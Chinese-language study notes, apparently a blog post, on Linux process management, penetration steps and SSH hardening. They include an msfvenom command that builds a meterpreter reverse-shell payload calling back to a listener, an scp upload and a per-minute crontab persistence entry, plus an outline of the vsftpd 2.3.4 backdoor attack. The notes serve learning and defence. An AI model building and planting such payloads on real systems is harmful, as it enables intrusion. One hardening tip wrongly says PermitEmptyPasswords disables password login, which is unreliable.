进程管理_Linux渗透_安全加固

一、爆破工具

1. Hydra：一个强大的密码破解工具，支持多种协议和服务。
2. Medeusa：类似于Hydra，用于破解密码的工具。
3. msf：Metasploit Framework，一个强大的渗透测试框架，包含多种爆破工具。

二、重要单词

1. session：会话，通常指在攻击过程中建立的与目标系统的交互通道。
2. Venom（毒液）：Metasploit Framework中的一个模块，用于生成恶意载荷。

三、任务管理器与进程管理

1. top：实时显示系统进程和资源使用情况。
2. pgrep：根据进程名称查找运行的进程。
   • 示例：pgrep -l sshd：列出所有运行的sshd进程及其进程号。
3. pkill：根据进程名称终止进程。
   • 示例：pkill -9 sshd：强制终止所有sshd进程。
4. kill -9 PID：强制终止指定进程号（PID）的进程。
5. sleep：暂停执行，等待指定时间。

四、服务漏洞利用

1. vsftpd 2.3.4-笑脸漏洞：vsftpd的一个已知漏洞，可用于攻击。
   • 步骤：
     • 收集信息。
     • 暴力破解。
     • 登录。
     • 上传后门脚本。

五、生成Payload

1. msfvenom：用于生成恶意载荷的工具。
   • 示例：msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.10.224 lport=4444 -f elf -o /root/pay：生成一个Linux x86架构的meterpreter reverse_tcp类型的恶意载荷，监听地址为192.168.10.224，监听端口为4444，输出文件名为/root/pay。

六、上传文件与侦听脚本

1. scp：用于在远程服务器之间复制文件。
   • 示例：scp /root/pay root@192.168.10.143:/root/：将本地/root/pay文件上传到远程服务器192.168.10.143的/root目录。

七、制定计划任务

1. crontab：用于设置计划任务。
   • 示例：crontab -e：编辑计划任务。
   • 示例：EDITOR=vim crontab -e：使用vim编辑器编辑计划任务。
   • 示例：*/1 * * * * command：每分钟运行一次command命令。

八、Linux安全加固

1. sshd_config：SSH服务配置文件。
   • 修改默认端口。
     • Port
   • 禁止root远程登录。
     • PermitRootLogin no
   • 设置密码输入次数。
     • MaxAuthTries 2
   • 设置远程白名单。
     • AllowUsers zhangsan@192.168.10.1
   • 登录时间限制。
     • LoginGraceTime 60
   • 终端超时退出。
     • /etc/profile->export TMOUT=30 超过30s自动断开连接
   • 定期更改密码。
     • /etc/login.defs                        
     • PASS_MAX_DAYS 修改新建用户默认密码使用时间·                
     • chage -l 列出用户密码使用天数                
     • chage -M 30 UserName 修改用户最大密码使用期限
   • 添加SSH公钥认证。
     • 使用 MobaXterm                
     • rm -rf /home/mobaxterm/.ssh/* 删除当前密钥                
     • ssh-keygen 生成密钥                
     • ssh-copy-id root@192.168.10.143 上传公钥                
     • win_cmd                
       • 使用公钥时禁用密码认证                         
         • PermitEmptyPasswords no

总结：

通过本文，我们了解了Linux系统中的爆破工具、服务漏洞利用以及安全加固措施。掌握这些知识对于保护Linux系统免受攻击至关重要。希望这些信息能帮助大家更好地管理和维护Linux系统。如有疑问，欢迎在评论区留言交流。谢谢阅读！